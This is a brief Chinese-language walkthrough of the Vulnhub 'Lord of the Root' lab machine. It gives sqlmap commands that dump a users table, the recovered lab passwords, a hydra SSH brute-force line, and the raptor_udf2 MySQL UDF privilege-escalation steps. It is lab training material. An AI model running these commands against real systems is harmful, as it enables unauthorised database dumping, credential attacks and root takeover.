Walkthroughs Archive Categories Tags RSS Feed 镜像下载
- 目录 -
Vulnhub 129 LORD OF THE ROOT 1.0.1 简

靶机链接:https://www.vulnhub.com/entry/lord-of-the-root-101,129/

环境配置

名称IP
Kali Linux192.168.88.153
LORD OF THE ROOT: 1.0.1192.168.88.155

1

<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>


1
2
3
4

$ sqlmap -u "http://192.168.88.155:1337/978345210/index.php" --forms
$ sqlmap -u "http://192.168.88.155:1337/978345210/index.php" --forms --dbs
$ sqlmap -u "http://192.168.88.155:1337/978345210/index.php" --forms --tables -D Webapp
$ sqlmap -u "http://192.168.88.155:1337/978345210/index.php" --forms --dump -T Users -D Webapp

idusernamepassword
1frodoiwilltakethering
2smeagolMyPreciousR00t
3aragornAndMySword
4legolasAndMyBow
5gimliAndMyAxe

$ hydra -L user -P pass 192.168.88.155 ssh

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc


1
2
3
4
5
6

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;

最后修改于 2015-09-23

Vulnhub靶机教程
Vulnhub中文网站
Walkthroughs Archive Categories Tags RSS Feed 镜像下载
Hugo Theme Diary by Rise
移植自 Makito's Journal.

© This is a customized copyright.
- 目录 -